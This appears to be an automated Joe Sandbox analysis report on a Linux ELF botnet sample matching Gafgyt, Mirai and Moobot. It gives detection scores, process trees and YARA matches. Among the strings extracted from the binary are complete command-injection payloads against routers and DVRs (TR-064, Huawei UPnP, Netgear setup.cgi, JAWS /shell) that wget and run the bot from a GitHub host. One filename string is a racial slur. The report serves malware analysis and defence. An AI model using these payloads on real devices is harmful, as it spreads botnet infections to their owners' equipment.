Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
.5r3fqt67ew531has4231.mpsl.elf

Overview

General Information

Sample name:.5r3fqt67ew531has4231.mpsl.elf
Analysis ID:1572617
MD5:663ac1bdb34abacde4a22fc79864e968
SHA1:5772847c44e6d5d560c6a89595fd621ced0c9e1d
SHA256:451c5699be2feac88af56d5cbfbb5efc9561794ec93844d1a010d9e6bc815f57
Tags:elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai, Moobot, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Yara detected Moobot
Yara detected Okiru
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1572617
Start date and time:2024-12-10 18:24:21 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:.5r3fqt67ew531has4231.mpsl.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@2/0
  • VT rate limit hit for: .5r3fqt67ew531has4231.mpsl.elf
Command:/tmp/.5r3fqt67ew531has4231.mpsl.elf
PID:5450
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The_Neko_Government_Initialised_The_Bot
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5424, Parent: 3581)
  • rm (PID: 5424, Parent: 3581, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.MLUwFpj4Yn /tmp/tmp.6lbeKTnKC1 /tmp/tmp.0oMEmhu7RZ
  • dash New Fork (PID: 5425, Parent: 3581)
  • rm (PID: 5425, Parent: 3581, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.MLUwFpj4Yn /tmp/tmp.6lbeKTnKC1 /tmp/tmp.0oMEmhu7RZ
  • .5r3fqt67ew531has4231.mpsl.elf (PID: 5450, Parent: 5348, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/.5r3fqt67ew531has4231.mpsl.elf
    • sh (PID: 5452, Parent: 5450, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/.5r3fqt67ew531has4231.mpsl.elf bin/busybox; chmod 777 bin/busybox"
      • sh New Fork (PID: 5454, Parent: 5452)
      • rm (PID: 5454, Parent: 5452, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 5455, Parent: 5452)
      • mkdir (PID: 5455, Parent: 5452, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 5456, Parent: 5452)
      • mv (PID: 5456, Parent: 5452, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/.5r3fqt67ew531has4231.mpsl.elf bin/busybox
      • sh New Fork (PID: 5457, Parent: 5452)
      • chmod (PID: 5457, Parent: 5452, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/busybox
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
.5r3fqt67ew531has4231.mpsl.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    .5r3fqt67ew531has4231.mpsl.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      .5r3fqt67ew531has4231.mpsl.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
        .5r3fqt67ew531has4231.mpsl.elfJoeSecurity_MoobotYara detected MoobotJoe Security
          .5r3fqt67ew531has4231.mpsl.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
              5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
                5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                  5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
                    5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                      Click to see the 27 entries
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: .5r3fqt67ew531has4231.mpsl.elfAvira: detected
                      Source: .5r3fqt67ew531has4231.mpsl.elfReversingLabs: Detection: 60%
                      Source: /tmp/.5r3fqt67ew531has4231.mpsl.elf (PID: 5450)Socket: 0.0.0.0:64230Jump to behavior
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7$
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;chmod
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;sh$
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;$
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;/tmp/.5r3
                      Source: .5r3fqt67ew531has4231.mpsl.elfString found in binary or memory: https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.bestone.sh
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37674
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37674 -> 443

                      System Summary

                      barindex
                      Source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                      Source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                      Source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                      Source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.bestone.sh && chmod 777 /tmp/.bestone.sh && /tmp/.bestone.sh tr064.selfrep`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g github.com -l /tmp/huawei -r /rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;chmod -x huawei;/tmp/huawei huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g github.com -l /tmp/.oxy -r /rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.bestone.sh && chmod 777 /tmp/.bestone.sh && /tmp/.bestone.sh tr064.selfrep`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.bestone.sh && chmod 777 /tmp/.bestone.sh && /tmp/.bestone.sh tr064.selfrep`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g github.com -l /tmp/huawei -r /rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;chmod -x huawei;/tmp/huawei huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips+-O+/tmp/netgear;sh+netgear+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                      Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OK.5r3fqt67ew531has4231.arm.5r3fqt67ew531has4231.arm7.5r3fqt67ew531has4231.mips.5r3fqt67ew531has4231.mpsl.5r3fqt67ew531has4231.x86.5r3fqt67ew531has4231.sh4.5r3fqt67ew531has4231.ppc.5r3fqt67ew531has4231.m68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g github.com -l /tmp/.oxy -r /rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                      Source: Initial sampleString containing 'busybox' found: var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetssh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/mapsexe/proc/self/maps
                      Source: Initial sampleString containing 'busybox' found: bin/busybox
                      Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/watchdog/bin/systemdGET /upgrade_handle.php?cmd=cd${IFS}/root;${IFS}wget${IFS}https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7${IFS}-o${IFS}NiGgErVr;chmod${IFS}001${IFS}NiGgErVr${IFS}nvr;sh${IFS}./NiGgErVr${IFS}nvr;chmod${IFS}777${IFS}NiGgErVr${IFS}nvr;rm${IFS}-rf${IFS}*&writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1
                      Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;chmod+777+.5r3fqt67ew531has4231.arm7;/tmp/.5r3fqt67ew531has4231.arm7+varcron.selfrep
                      Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;${IFS}sh${IFS}/var/tmp/.5r3fqt67ew531has4231.mips r7064.selfrep
                      Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;chmod+777+.5r3fqt67ew531has4231.arm7;/tmp/.5r3fqt67ew531has4231.arm7+jaws.selfrep HTTP/1.1
                      Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;sh${IFS}/tmp/.5r3fqt67ew531has4231.arm7${IFS}arm7selfrep&>r&&tar${IFS}/string.js HTTP/1.0
                      Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips+-O+/tmp/netgear;sh+netgear+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                      Source: Initial samplePotential command found: GET /
                      Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;chmod+777+.5r3fqt67ew531has4231.arm7;/tmp/.5r3fqt67ew531has4231.arm7+varcron.selfrep%d.%d.%d.%dGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;${IFS}sh${IFS}/var/tmp/.5r3fqt67ew531has4231.mips r7064.selfrepPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                      Source: Initial samplePotential command found: GET /upgrade_handle.php?cmd=cd${IFS}/root;${IFS}wget${IFS}https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7${IFS}-o${IFS}NiGgErVr;chmod${IFS}001${IFS}NiGgErVr${IFS}nvr;sh${IFS}./NiGgErVr${IFS}nvr;chmod${IFS}777${IFS}NiGgErVr${IFS}nvr;rm${IFS}-rf${IFS}*&writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1
                      Source: Initial samplePotential command found: GET /bestone/%s HTTP/1.0
                      Source: ELF static info symbol of initial sample.symtab present: no
                      Source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                      Source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                      Source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                      Source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: classification engineClassification label: mal100.troj.linELF@0/0@2/0
                      Source: /tmp/.5r3fqt67ew531has4231.mpsl.elf (PID: 5452)Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/.5r3fqt67ew531has4231.mpsl.elf bin/busybox; chmod 777 bin/busybox"Jump to behavior
                      Source: /bin/sh (PID: 5457)Chmod executable: /usr/bin/chmod -> chmod 777 bin/busyboxJump to behavior
                      Source: /bin/sh (PID: 5455)Mkdir executable: /usr/bin/mkdir -> mkdir binJump to behavior
                      Source: /usr/bin/dash (PID: 5424)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.MLUwFpj4Yn /tmp/tmp.6lbeKTnKC1 /tmp/tmp.0oMEmhu7RZJump to behavior
                      Source: /usr/bin/dash (PID: 5425)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.MLUwFpj4Yn /tmp/tmp.6lbeKTnKC1 /tmp/tmp.0oMEmhu7RZJump to behavior
                      Source: /bin/sh (PID: 5454)Rm executable: /usr/bin/rm -> rm -rf bin/busyboxJump to behavior
                      Source: /usr/bin/chmod (PID: 5457)File: /tmp/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
                      Source: /bin/sh (PID: 5457)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/busyboxJump to behavior
                      Source: /tmp/.5r3fqt67ew531has4231.mpsl.elf (PID: 5450)Queries kernel information via 'uname': Jump to behavior
                      Source: .5r3fqt67ew531has4231.mpsl.elf, 5450.1.00007fffe1176000.00007fffe1197000.rw-.sdmp, .5r3fqt67ew531has4231.mpsl.elf, 5458.1.00007fffe1176000.00007fffe1197000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/.5r3fqt67ew531has4231.mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/.5r3fqt67ew531has4231.mpsl.elf
                      Source: .5r3fqt67ew531has4231.mpsl.elf, 5450.1.000056449b575000.000056449b61d000.rw-.sdmp, .5r3fqt67ew531has4231.mpsl.elf, 5458.1.000056449b575000.000056449b61d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
                      Source: .5r3fqt67ew531has4231.mpsl.elf, 5450.1.000056449b575000.000056449b61d000.rw-.sdmp, .5r3fqt67ew531has4231.mpsl.elf, 5458.1.000056449b575000.000056449b61d000.rw-.sdmpBinary or memory string: DV!/etc/qemu-binfmt/mipsel
                      Source: .5r3fqt67ew531has4231.mpsl.elf, 5450.1.00007fffe1176000.00007fffe1197000.rw-.sdmp, .5r3fqt67ew531has4231.mpsl.elf, 5458.1.00007fffe1176000.00007fffe1197000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
                      Source: .5r3fqt67ew531has4231.mpsl.elf, 5458.1.00007fffe1176000.00007fffe1197000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTR
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTR
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
